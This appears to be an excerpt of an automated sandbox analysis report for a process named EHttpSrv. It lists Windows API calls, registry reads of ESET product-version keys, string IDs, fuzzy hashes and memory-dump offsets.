• String ID: %d.%d.%d.%d
• API String ID: 2565221431-3491811756
• Opcode ID: 1b96df800e304920a0115d2cb6ad1b36057cacb305216eed5eef70d8304d5a87
• Instruction ID: e6bc5996723d5b37b73d512024ffb5d4e11874207e31cf63148c0156e5b1bce3
• Opcode Fuzzy Hash: 1b96df800e304920a0115d2cb6ad1b36057cacb305216eed5eef70d8304d5a87
• Instruction Fuzzy Hash: 2B2120311086509ED364CB95CC80E37F7F9ABC9608F09C88DF8A40B2A6D239F9468B20
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _snwprintf_s$#2310
• String ID: %d.%d.%d.%d
• API String ID: 921588996-3491811756
• Opcode ID: 5fb0a209fa81a561125ac6c09dff1d6614aed634006b3f9d46bfa7fd8e06037a
• Instruction ID: b1c32227e64822f16640b2784a13768f6d212c5f5b3873dce6694a974748ca9a
• Opcode Fuzzy Hash: 5fb0a209fa81a561125ac6c09dff1d6614aed634006b3f9d46bfa7fd8e06037a
• Instruction Fuzzy Hash: 7D1104B11083106BC304CB698C90EBBF7E9ABD8301F408E1EF9D1922D1D679E524DB72
APIs
  • Part of subcall function 20406540: wcscpy_s.MSVCR80 ref: 204066C2
  • Part of subcall function 20406540: wcschr.MSVCR80 ref: 204066EB
• _snwprintf_s.MSVCR80 ref: 204062D8
• wcschr.MSVCR80 ref: 20406304
• _snwprintf_s.MSVCR80 ref: 20406322
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _snwprintf_swcschr$wcscpy_s
• String ID: %%%d
• API String ID: 1759257516-704803261
• Opcode ID: e7371da27c0bddc6dcdb050928b916e4e307d7d8195393fa1b92d13a1548eea4
• Instruction ID: 522c5e4176b67f78ba8be082eb7b4f6369f96635ae9f8aa8f9e4ab9c953b70f6
• Opcode Fuzzy Hash: e7371da27c0bddc6dcdb050928b916e4e307d7d8195393fa1b92d13a1548eea4
• Instruction Fuzzy Hash: F2114C312006296BC714AF5C9D88D7F776AEB80315B458B3DFD51A32C4C725FD1986B0
APIs
• _snwprintf_s.MSVCR80 ref: 20406202
  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
• wcschr.MSVCR80 ref: 2040622D
• _snwprintf_s.MSVCR80 ref: 20406247
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _snwprintf_s$wcschrwcscpy_s
• String ID: %d.%d.%d.%d
• API String ID: 584907567-3491811756
• Opcode ID: cf1b214b1a40a5629e9223c01a41b2366a36f0f5e33a4f3ec048d969d7ad2733
• Instruction ID: 62284f0cb5b1c6d56f04d6346a0236fee5cd40c6f8b159ead40cda12a97532b1
• Opcode Fuzzy Hash: cf1b214b1a40a5629e9223c01a41b2366a36f0f5e33a4f3ec048d969d7ad2733
• Instruction Fuzzy Hash: FF114C725046387787212F5D4D84CBF3BADDAC4725B44C619FE94672C4C5387E118BB4
APIs
  • Part of subcall function 2042C340: #356.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF,2047EBCB,000000FF,204402AC,0000000B,FEEA6C22,00000000,00000000,00000104,2047FA81,000000FF,20445D01), ref: 2042C369
  • Part of subcall function 2042C340: #310.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF), ref: 2042C3B1
  • Part of subcall function 2042C340: #563.MFC80U(?,000000FF), ref: 2042C3C2
• #6735.MFC80U ref: 204402E6
  • Part of subcall function 20424700: #572.MFC80U(FEEA6C22,000000FF,00000000,2047A038,000000FF,20425F90,0000017F,000000FF,2047B3D6,FEEA6C22,?,?,?,2047B3D6,000000FF,20428C79), ref: 20424727
• #6735.MFC80U(20485878,0000011F), ref: 2044030D
• #6735.MFC80U(20485878), ref: 20440323
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6735$#310#356#563#572
• String ID: 4H
• API String ID: 3660135715-267674204
• Opcode ID: 207525e7d9b9a88def6f2e2f9cce33c0383f00cf5ba607997c4762eb9fcf0969
• Instruction ID: 363adbb328d852d6b09fcd62fbcb88f34514aa4ee2b8565f9c1794eb3b7c0308
• Opcode Fuzzy Hash: 207525e7d9b9a88def6f2e2f9cce33c0383f00cf5ba607997c4762eb9fcf0969
• Instruction Fuzzy Hash: 34212971409B419FD321CF64ED84BD7FBE4FB59714F408D2EE4A682280CB79A508CBA2
APIs
  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
• RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043C1B7), ref: 2043BD4F
  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: 4~H $ProductVersion$Software\ESET\ESET Security\CurrentVersion\Info
• API String ID: 3677997916-3933421762
• Opcode ID: afc6a44b089bdcb016b5a6ef78c43ae4238845301192c1b7bdd1c23f2bd2b367
• Instruction ID: 914dfda0ce83377511228f51b07b4ab881ac781a6ba4cd484d9ae1c21c81ffde
• Opcode Fuzzy Hash: afc6a44b089bdcb016b5a6ef78c43ae4238845301192c1b7bdd1c23f2bd2b367
• Instruction Fuzzy Hash: 60F0F6220442196AD3106BD5AC42F77B7ECDF15689F30D41DBA5486141EFBD9C5095E2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000002,?,2043C0B9,00000105), ref: 2043BDCE
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: ProductName$Software\ESET\ESET Security\CurrentVersion\Info$T~H
                                                                                                                • API String ID: 3677997916-2656945498
                                                                                                                • Opcode ID: 1b30e3a84631aab0c4b7d4b110c5badaf1cd747ca1323e0ffffa4887a791e24d
                                                                                                                • Instruction ID: 65d34e742e52f4b2defbbd06fcf1642087ee4278305361be0e027dd8d7bc9dbd
                                                                                                                • Opcode Fuzzy Hash: 1b30e3a84631aab0c4b7d4b110c5badaf1cd747ca1323e0ffffa4887a791e24d
                                                                                                                • Instruction Fuzzy Hash: D3F0C262044319AAD310AFD0EC82F6BB7E8EF55648F20E81DBA4542541EB7C9C549692
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(00000000,?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D766
                                                                                                                • #1058.MFC80U(?,GIF), ref: 2043D77A
                                                                                                                • #1058.MFC80U(?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D790
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1058$FindResource
                                                                                                                • String ID: GIF
                                                                                                                • API String ID: 2438790252-881873598
                                                                                                                • Opcode ID: 9eb4c446ac0929af3a9cd147b67188f7ef94327fbaa61bebdc1786359fc39285
                                                                                                                • Instruction ID: a20db0469bcc12d11d5da9d1ad7551215c0c58e1f7aa44d32378eaca37f11d3e
                                                                                                                • Opcode Fuzzy Hash: 9eb4c446ac0929af3a9cd147b67188f7ef94327fbaa61bebdc1786359fc39285
                                                                                                                • Instruction Fuzzy Hash: E3F0A7729005297A81105BD9AC90A9F7B5EDA865ADB50C039FD4C82227F72DDC018FA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00079081,20499408), ref: 20439080
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00079081,20499408), ref: 20439091
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Replace), ref: 204390AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Replace
                                                                                                                • API String ID: 310444273-3096891558
                                                                                                                • Opcode ID: 52852995afb5886327d2e362851438bf7aba3aee773e5fa7b5c832c119c7e6ea
                                                                                                                • Instruction ID: 64b91df37241fb0394471559f0806e23743298c2429490576642b568fbc93b1b
                                                                                                                • Opcode Fuzzy Hash: 52852995afb5886327d2e362851438bf7aba3aee773e5fa7b5c832c119c7e6ea
                                                                                                                • Instruction Fuzzy Hash: 31F07F75A05B019FC724CFA9D988B02BBF8BB48A15B10DC2DE5DAC3A11DB39E940DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,20435186,?,?), ref: 20435220
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435231
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Add), ref: 2043524B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Add
                                                                                                                • API String ID: 310444273-2139371048
                                                                                                                • Opcode ID: 059ce8af9f42aabfe0cd5e377f5a41b3970c0beea28853d1bbe08e662d45d612
                                                                                                                • Instruction ID: 61125b7eef0a31584287f038c8e0a1b67b7715f4f3ef1c4395f14a17ca5db06c
                                                                                                                • Opcode Fuzzy Hash: 059ce8af9f42aabfe0cd5e377f5a41b3970c0beea28853d1bbe08e662d45d612
                                                                                                                • Instruction Fuzzy Hash: CDF07475605B019FC720CFA9C988B07B7E4AB0CA25F10DD6DA49AC3A25D738E584DF04
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?), ref: 20435AB3
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435AC4
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 20435ADE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                • API String ID: 310444273-158344479
                                                                                                                • Opcode ID: c024165aa123b689d06b6dbdf8e77b7d6a87fe6dc0445346d27547bcca64b791
                                                                                                                • Instruction ID: e0c6696969016ec1769552a578c8248ca279875db4b0b8f7fac6fa2bfb55e8b3
                                                                                                                • Opcode Fuzzy Hash: c024165aa123b689d06b6dbdf8e77b7d6a87fe6dc0445346d27547bcca64b791
                                                                                                                • Instruction Fuzzy Hash: AAF0D470A04B01DFD720DFB8C888B02B7E4AB08A25F10D82DA4AAC3651DB38E440DF10
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,204272C9), ref: 20427360
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20427371
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_SetBkColor), ref: 2042738B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_SetBkColor
                                                                                                                • API String ID: 310444273-1554945321
                                                                                                                • Opcode ID: e8d77fa53df3f7ee09eaa64477699b8d18d36c9305cf34044fe3b494192e285d
                                                                                                                • Instruction ID: 284c7b030e246ad0862ef96458f4fdec8fd086ceb7392f24da5df9d6a012c85e
                                                                                                                • Opcode Fuzzy Hash: e8d77fa53df3f7ee09eaa64477699b8d18d36c9305cf34044fe3b494192e285d
                                                                                                                • Instruction Fuzzy Hash: E3F07475605B01DFD760CFA8D988B07B7E4BB08A19B00D82DE89AC3A11D738E940DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,204352D9,?,?,FEEA6C22), ref: 20435370
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435381
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 2043539B
                                                                                                                Strings
                                                                                                                • ImageList_GetImageCount, xrefs: 20435395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_GetImageCount
                                                                                                                • API String ID: 310444273-4246500564
                                                                                                                • Opcode ID: d8097c728569e3866e52bdd65f396c4fad9623ee8d0876328ff2cbbc020671d3
                                                                                                                • Instruction ID: 2da6b41783d0211aef1b011f4005f966f4402148aba3db6cb9b097729d0c8202
                                                                                                                • Opcode Fuzzy Hash: d8097c728569e3866e52bdd65f396c4fad9623ee8d0876328ff2cbbc020671d3
                                                                                                                • Instruction Fuzzy Hash: F2F06275605B019FC760CFA8C988B06B7E4BF08A55B10DD2DA4DAC7A11E778E540DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,20435436,?), ref: 204354D0
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 204354E1
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_ReplaceIcon), ref: 204354FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_ReplaceIcon
                                                                                                                • API String ID: 310444273-3264144174
                                                                                                                • Opcode ID: 74c869a9a8c2336e005997e81289362f39642b772dcdaed8b0994d0f4db7fbd2
                                                                                                                • Instruction ID: 3e15f9a9b1d919c9fe31402087bf8c7712b9f134e2685c61a9ad19c662dd77c6
                                                                                                                • Opcode Fuzzy Hash: 74c869a9a8c2336e005997e81289362f39642b772dcdaed8b0994d0f4db7fbd2
                                                                                                                • Instruction Fuzzy Hash: 5FF07475605B01DFC720CFA9C988B06B7E4AB1CA16B10D92DE49AC3A51D738F980DF04
APIs
• GetModuleHandleW.KERNEL32(?), ref: 20438D90
• LoadLibraryW.KERNEL32(?), ref: 20438DA1
• GetProcAddress.KERNEL32(00000000,ImageList_Remove), ref: 20438DBB
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_Remove
• API String ID: 310444273-1758120396
• Opcode ID: 079ee940bcfe234ec36ffd8b644cc9a63304a968f59cf3a307cb535ea809afee
• Instruction ID: 16fb2f48fd19f0c7492424fa88f2029c9d2318f9a38d168fc86bc1dfa45b5a4d
• Opcode Fuzzy Hash: 079ee940bcfe234ec36ffd8b644cc9a63304a968f59cf3a307cb535ea809afee
• Instruction Fuzzy Hash: 3BF07475605B019FC760CFB8C988B02B7E4BB58A19B10DC2DE09AC3B91D778E580DB00
APIs
• GetModuleHandleW.KERNEL32(?,20438E89,?,00000000,FEEA6C22,00000000,00000000,?,?,00000001,?,00000000,00000000,?), ref: 20438F30
• LoadLibraryW.KERNEL32(?,?,00000001,?,00000000,00000000,?), ref: 20438F41
• GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 20438F5B
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_Draw
• API String ID: 310444273-2074868843
• Opcode ID: 5d39e66da341277afc1545f6a1c92b557577de52ee8df2f5711e62b8d41952b8
• Instruction ID: 8b8081af3f1095d29bb6d133c22ff23e0a3673458e9ea1b94d5029bc85ce2e59
• Opcode Fuzzy Hash: 5d39e66da341277afc1545f6a1c92b557577de52ee8df2f5711e62b8d41952b8
• Instruction Fuzzy Hash: D4F06275605B019FD760DFA9D988B02B7E5BB08A15B10DD2DA49AC3A11D778F540DF00
APIs
• #314.MFC80U(00000000), ref: 2044EEF2
• EnterCriticalSection.KERNEL32(-00003AFC), ref: 2044EF14
  • Part of subcall function 2044F870: EnterCriticalSection.KERNEL32(-00003A6C), ref: 2044F886
  • Part of subcall function 2044F870: LeaveCriticalSection.KERNEL32(-00003A6C,?), ref: 2044F89C
  • Part of subcall function 2040E8B0: _wcsicmp.MSVCR80 ref: 2040E8F6
• _time32.MSVCR80 ref: 2044F19D
• #6751.MFC80U(00000000,?), ref: 2044F241
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CriticalSection$Enter$#314#6751Leave_time32_wcsicmp
• String ID:
• API String ID: 572526790-0
• Opcode ID: ed03fb45f41e36c0d5e5fc2ddcd8a74d31b367c40610b0e286b421728a2960dc
• Instruction ID: a41998383fe25ffac22fc7ccb07849e4817f59a96ff63d102d77dae527154431
• Opcode Fuzzy Hash: ed03fb45f41e36c0d5e5fc2ddcd8a74d31b367c40610b0e286b421728a2960dc
• Instruction Fuzzy Hash: 9CB19E31A04641DBE705CFA5C980B56B7A6BB84308F54C7BDE9484B787CB39AE46CB81
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 2044B6C3
• #6751.MFC80U(00000000,?), ref: 2044B743
• #1176.MFC80U(?), ref: 2044B80F
• #6751.MFC80U(00000000,?,?), ref: 2044B930
  • Part of subcall function 2042D0B0: IsWindow.USER32(?), ref: 2042D0E9
  • Part of subcall function 2042D0B0: PostMessageW.USER32(?,00000445,010300D4), ref: 2042D102
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6751$#1176#314MessagePostWindow
• String ID:
• API String ID: 3217281582-0
• Opcode ID: 5fa345bc5857240e9f86b57c889d0dfae663a8f57130abd31cf7eab99548e548
• Instruction ID: b28df402dce2b7cef7e71af0391a6853a6e5c8744560c8c3959885f1aa1c6a3a
• Opcode Fuzzy Hash: 5fa345bc5857240e9f86b57c889d0dfae663a8f57130abd31cf7eab99548e548
• Instruction Fuzzy Hash: 4F814574A087419FE314DF64C441B5ABBF4BF84318F10CA2DE599873A1DB78E945CB92
APIs
• #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20410F83
• #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20410FE3
• #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20411043
• #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 204110A3
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
